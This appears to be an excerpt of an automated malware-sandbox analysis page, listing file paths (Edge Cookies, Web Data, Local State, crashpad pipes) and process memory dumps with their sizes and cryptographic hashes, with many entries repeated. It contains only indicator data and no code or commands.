582a006caf5be200f4e74d18b5389bc447bea186f3f7d0ff3a436f2dbb9d44c8

SHA512
45b2eede98b7950f1296f09382dc004d71b5254ff634b6a70ded2de5915a26519f50db513d20c77359294aff423699bf602c308b1f917f1e822f2066cab1295e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9ea6ce631f0dbc87fe530c4269861cca

SHA1
0836ec64123dacff7c804da0c6b413b358cb2986

SHA256
582a006caf5be200f4e74d18b5389bc447bea186f3f7d0ff3a436f2dbb9d44c8

SHA512
45b2eede98b7950f1296f09382dc004d71b5254ff634b6a70ded2de5915a26519f50db513d20c77359294aff423699bf602c308b1f917f1e822f2066cab1295e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9ea6ce631f0dbc87fe530c4269861cca

SHA1
0836ec64123dacff7c804da0c6b413b358cb2986

SHA256
582a006caf5be200f4e74d18b5389bc447bea186f3f7d0ff3a436f2dbb9d44c8

SHA512
45b2eede98b7950f1296f09382dc004d71b5254ff634b6a70ded2de5915a26519f50db513d20c77359294aff423699bf602c308b1f917f1e822f2066cab1295e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9ea6ce631f0dbc87fe530c4269861cca

SHA1
0836ec64123dacff7c804da0c6b413b358cb2986

SHA256
582a006caf5be200f4e74d18b5389bc447bea186f3f7d0ff3a436f2dbb9d44c8

SHA512
45b2eede98b7950f1296f09382dc004d71b5254ff634b6a70ded2de5915a26519f50db513d20c77359294aff423699bf602c308b1f917f1e822f2066cab1295e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9ea6ce631f0dbc87fe530c4269861cca

SHA1
0836ec64123dacff7c804da0c6b413b358cb2986

SHA256
582a006caf5be200f4e74d18b5389bc447bea186f3f7d0ff3a436f2dbb9d44c8

SHA512
45b2eede98b7950f1296f09382dc004d71b5254ff634b6a70ded2de5915a26519f50db513d20c77359294aff423699bf602c308b1f917f1e822f2066cab1295e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a7134c5f7a65d606c63a36922e587450

SHA1
c7aebb450811d36a3c31d504e545edcbde2c67ac

SHA256
d28f17c59dbd744081992eadfddc16c8539bd04ecc1fd7499397fab24380beee

SHA512
f6748400e89255259ab0979af56457b8449b846228386b035068b0d6d3e374652d0e33f0d33aa8c49aca739a9fa03a30583a6886e869aa919607e7da9bd36177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a7134c5f7a65d606c63a36922e587450

SHA1
c7aebb450811d36a3c31d504e545edcbde2c67ac

SHA256
d28f17c59dbd744081992eadfddc16c8539bd04ecc1fd7499397fab24380beee

SHA512
f6748400e89255259ab0979af56457b8449b846228386b035068b0d6d3e374652d0e33f0d33aa8c49aca739a9fa03a30583a6886e869aa919607e7da9bd36177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
3c46e5bbf6f7d023190fcb88507a5279

SHA1
ac162dd2dd0cf28cf1c072f1c98bc5c3354b74af

SHA256
3d907044b4ba63e0d9c12b38c83b2346b60cd97281545dbf65e9fec48cdd8334

SHA512
eff0879f35d143c0d5e2afd6b316a9c14a29d6d8cd655d942d57f64fef1aa87b5ce232bee54dfbaac3131f5a6c7a7cfe66cd1aad1d48d9759f087f43379ed615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
be6c0e1237e80849f42ddd237723c0d1

SHA1
cb2f81a5732febe59234650ccab2e7921a691bd3

SHA256
3e3c06ede06c12ce12023a4f34886245ced2582e442907ac1c138879512ad38f

SHA512
9f2a056c2a27d9d919dbe0fcff72b500849124b98b0851577db68e9a6407beec2989cbe9ff009f27f1911f2199b6f302caca532c0cc552b3ccec74b5f8e4831a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
f87f2decfb32c4d77fc15e41cb94ccca

SHA1
765aa4454c5a46de2933f21070680b341361f12c

SHA256
57e05cebc7040b041b87bd5bbbe183096d67f2876057e82f7ec085dbf953e7c6

SHA512
2a3daab565567e412b37d68980e59cb2e3020fa77e02e2f4d5b42e7a240b4bf30c6bdef93c0e35b9a6690142b24de7579b527c0dac48f6eb89bc7882286a94d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
84d459ba2fac27f7d7f0452bacb69604

SHA1
44ddf7a795fa7b136909889043e42197f4a170e2

SHA256
1cc0c2571eaf0730057f91104373df7d66b34488b02ad6831136804e4ccc5436

SHA512
7ce3451b5c5c683798af8a8e66608e01f8503a0cfa515bd8c6d8f399181ea3680e2bd5311bdf08407bbf0b0f8cb7016ac347b3f257ba5b246ad07813952cd1d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
3c46e5bbf6f7d023190fcb88507a5279

SHA1
ac162dd2dd0cf28cf1c072f1c98bc5c3354b74af

SHA256
3d907044b4ba63e0d9c12b38c83b2346b60cd97281545dbf65e9fec48cdd8334

SHA512
eff0879f35d143c0d5e2afd6b316a9c14a29d6d8cd655d942d57f64fef1aa87b5ce232bee54dfbaac3131f5a6c7a7cfe66cd1aad1d48d9759f087f43379ed615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
a079191d4c544083f340d94848541e9d

SHA1
a2e3f18ba31cd0ad55ec95f0661c27fef550eef7

SHA256
5074c834c1464d02396632aab341e16790cb7ee5eab69ec48fe51ada69cf183b

SHA512
ed32b80d0eaae1107a346e120d032f27f6a99b85ff497ae062f0462668306273f9a7d59583a697828f2582d1a0eeb81e039b76e82c5a532198c1a96f0360d89a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
b2c9ac03261fe2de15af658e283a701f

SHA1
3af2c14029ac1b137d2c687bb482a37f62ab312e

SHA256
3631cc9fd3b673decda845b47381e0dbd9f8a79c734023cb90e9135147fedbf7

SHA512
5f9851cdb523e4f5d385a659abc2cfe9f1cf7537510b32044fbbca92520c344397e04703717009869ba6609a46b166d9a72c8aea24b33cfea5c7dd6b7596e383

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
a079191d4c544083f340d94848541e9d

SHA1
a2e3f18ba31cd0ad55ec95f0661c27fef550eef7

SHA256
5074c834c1464d02396632aab341e16790cb7ee5eab69ec48fe51ada69cf183b

SHA512
ed32b80d0eaae1107a346e120d032f27f6a99b85ff497ae062f0462668306273f9a7d59583a697828f2582d1a0eeb81e039b76e82c5a532198c1a96f0360d89a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
f87f2decfb32c4d77fc15e41cb94ccca

SHA1
765aa4454c5a46de2933f21070680b341361f12c

SHA256
57e05cebc7040b041b87bd5bbbe183096d67f2876057e82f7ec085dbf953e7c6

SHA512
2a3daab565567e412b37d68980e59cb2e3020fa77e02e2f4d5b42e7a240b4bf30c6bdef93c0e35b9a6690142b24de7579b527c0dac48f6eb89bc7882286a94d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
be6c0e1237e80849f42ddd237723c0d1

SHA1
cb2f81a5732febe59234650ccab2e7921a691bd3

SHA256
3e3c06ede06c12ce12023a4f34886245ced2582e442907ac1c138879512ad38f

SHA512
9f2a056c2a27d9d919dbe0fcff72b500849124b98b0851577db68e9a6407beec2989cbe9ff009f27f1911f2199b6f302caca532c0cc552b3ccec74b5f8e4831a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
84d459ba2fac27f7d7f0452bacb69604

SHA1
44ddf7a795fa7b136909889043e42197f4a170e2

SHA256
1cc0c2571eaf0730057f91104373df7d66b34488b02ad6831136804e4ccc5436

SHA512
7ce3451b5c5c683798af8a8e66608e01f8503a0cfa515bd8c6d8f399181ea3680e2bd5311bdf08407bbf0b0f8cb7016ac347b3f257ba5b246ad07813952cd1d0

Download Submit
\??\pipe\LOCAL\crashpad_1296_RLGIIKKFHCGOPQWV
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4156_NHPXZHLMJVBGRRBG
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_460_ZSCCUSMKTSCIXEAY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4964_FZTDEVZXZGOTLBUI
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/216-181-0x0000000000000000-mapping.dmp

Download
memory/460-131-0x0000000000000000-mapping.dmp

Download
memory/1284-184-0x0000000000000000-mapping.dmp

Download
memory/1296-132-0x0000000000000000-mapping.dmp

Download
memory/1448-185-0x0000000000000000-mapping.dmp

Download
memory/1496-218-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/1496-155-0x0000000000000000-mapping.dmp

Download
memory/1664-304-0x0000000000000000-mapping.dmp

Download
memory/1704-149-0x0000000000000000-mapping.dmp

Download
memory/1740-289-0x00000000026B0000-0x00000000026E6000-memory.dmp

Filesize
216KB

Download
memory/1740-288-0x0000000000000000-mapping.dmp

Download
memory/1740-291-0x00000000050D0000-0x00000000050F2000-memory.dmp

Filesize
136KB

Download
memory/1740-290-0x0000000005310000-0x0000000005938000-memory.dmp

Filesize
6.2MB

Download
memory/1740-296-0x0000000005FB0000-0x0000000005FCE000-memory.dmp

Filesize
120KB

Download
memory/1740-292-0x0000000005270000-0x00000000052D6000-memory.dmp

Filesize
408KB

Download
memory/1764-279-0x0000000000000000-mapping.dmp

Download
memory/1856-160-0x0000000000000000-mapping.dmp

Download
memory/2380-307-0x0000000000000000-mapping.dmp

Download
memory/2628-137-0x0000000000000000-mapping.dmp

Download
memory/2896-134-0x0000000000000000-mapping.dmp

Download
memory/3004-236-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/3004-293-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/3004-234-0x0000000002160000-0x0000000002176000-memory.dmp

Filesize
88KB

Download
memory/3004-287-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/3004-183-0x0000000000000000-mapping.dmp

Download
memory/3044-207-0x00000000057F0000-0x0000000005802000-memory.dmp

Filesize
72KB

Download
memory/3044-165-0x0000000000000000-mapping.dmp

Download
memory/3044-209-0x0000000005920000-0x0000000005A2A000-memory.dmp

Filesize
1.0MB

Download
memory/3044-206-0x0000000005DD0000-0x00000000063E8000-memory.dmp

Filesize
6.1MB

Download
memory/3044-173-0x0000000000FA0000-0x0000000000FC0000-memory.dmp

Filesize
128KB

Download
memory/3056-135-0x0000000000000000-mapping.dmp

Download
memory/3180-285-0x0000000000000000-mapping.dmp

Download
memory/3184-312-0x0000000000000000-mapping.dmp

Download
memory/3320-314-0x0000000000000000-mapping.dmp

Download
memory/3480-187-0x0000000000000000-mapping.dmp

Download
memory/3868-142-0x0000000000000000-mapping.dmp

Download
memory/3888-168-0x00000000002D0000-0x0000000000314000-memory.dmp

Filesize
272KB

Download
memory/3888-276-0x0000000005010000-0x0000000005076000-memory.dmp

Filesize
408KB

Download
memory/3888-161-0x0000000000000000-mapping.dmp

Download
memory/3888-211-0x0000000004D20000-0x0000000004D5C000-memory.dmp

Filesize
240KB

Download
memory/3888-294-0x00000000075C0000-0x0000000007782000-memory.dmp

Filesize
1.8MB

Download
memory/3888-295-0x0000000007CC0000-0x00000000081EC000-memory.dmp

Filesize
5.2MB

Download
memory/3992-148-0x0000000000000000-mapping.dmp

Download
memory/4056-305-0x0000000000000000-mapping.dmp

Download
memory/4112-188-0x0000000000000000-mapping.dmp

Download
memory/4156-139-0x0000000000000000-mapping.dmp

Download
memory/4392-164-0x0000000000000000-mapping.dmp

Download
memory/4444-193-0x0000000000000000-mapping.dmp

Download
memory/4656-136-0x0000000000000000-mapping.dmp

Download
memory/4812-177-0x0000000000000000-mapping.dmp

Download
memory/4956-311-0x0000000000000000-mapping.dmp

Download
memory/4964-130-0x0000000000000000-mapping.dmp

Download
memory/4976-133-0x0000000000000000-mapping.dmp

Download
memory/5028-286-0x00000000069D0000-0x0000000006A20000-memory.dmp

Filesize
320KB

Download
memory/5028-162-0x00000000003B0000-0x00000000003F4000-memory.dmp

Filesize
272KB

Download
memory/5028-151-0x0000000000000000-mapping.dmp

Download
memory/5028-274-0x0000000008110000-0x00000000086B4000-memory.dmp

Filesize
5.6MB

Download
memory/5028-275-0x0000000005CE0000-0x0000000005D72000-memory.dmp

Filesize
584KB

Download
memory/5028-277-0x00000000064E0000-0x0000000006556000-memory.dmp

Filesize
472KB

Download
memory/5028-278-0x0000000006580000-0x000000000659E000-memory.dmp

Filesize
120KB

Download
memory/5116-178-0x0000000000000000-mapping.dmp

Download
memory/5160-316-0x0000000000000000-mapping.dmp

Download
memory/5368-199-0x0000000000000000-mapping.dmp

Download
memory/5368-298-0x00000000001E0000-0x00000000001EF000-memory.dmp

Filesize
60KB

Download
memory/5368-297-0x00000000006C3000-0x00000000006D4000-memory.dmp

Filesize
68KB

Download
memory/5368-299-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/5368-302-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/5368-301-0x00000000006C3000-0x00000000006D4000-memory.dmp

Filesize
68KB

Download
memory/5392-201-0x0000000000000000-mapping.dmp

Download
memory/5564-205-0x0000000000000000-mapping.dmp

Download
memory/5576-214-0x0000000000000000-mapping.dmp

Download
memory/5808-309-0x0000000000000000-mapping.dmp

Download
memory/5824-300-0x0000000000000000-mapping.dmp

Download
memory/6000-210-0x0000000000000000-mapping.dmp

Download
memory/6024-281-0x0000000000000000-mapping.dmp

Download
memory/6128-213-0x0000000000000000-mapping.dmp

Download
memory/6148-223-0x0000000000000000-mapping.dmp

Download
memory/6340-283-0x0000000000000000-mapping.dmp

Download
memory/6384-233-0x0000000000000000-mapping.dmp

Download
memory/6452-241-0x0000000000000000-mapping.dmp

Download
memory/6532-240-0x0000000000000000-mapping.dmp

Download
memory/6564-246-0x0000000000000000-mapping.dmp

Download
memory/6612-254-0x0000000000B80000-0x0000000000BA0000-memory.dmp

Filesize
128KB

Download
memory/6612-248-0x0000000000000000-mapping.dmp

Download
memory/6632-245-0x0000000000000000-mapping.dmp

Download
memory/6780-303-0x0000000000000000-mapping.dmp

Download
memory/6892-267-0x0000000000000000-mapping.dmp

Download
memory/6988-268-0x0000000000000000-mapping.dmp

Download
memory/7008-269-0x0000000000000000-mapping.dmp

Download
memory/7020-270-0x0000000000000000-mapping.dmp

Download
memory/7120-271-0x0000000000000000-mapping.dmp

Download
memory/7152-273-0x0000000000000000-mapping.dmp

Download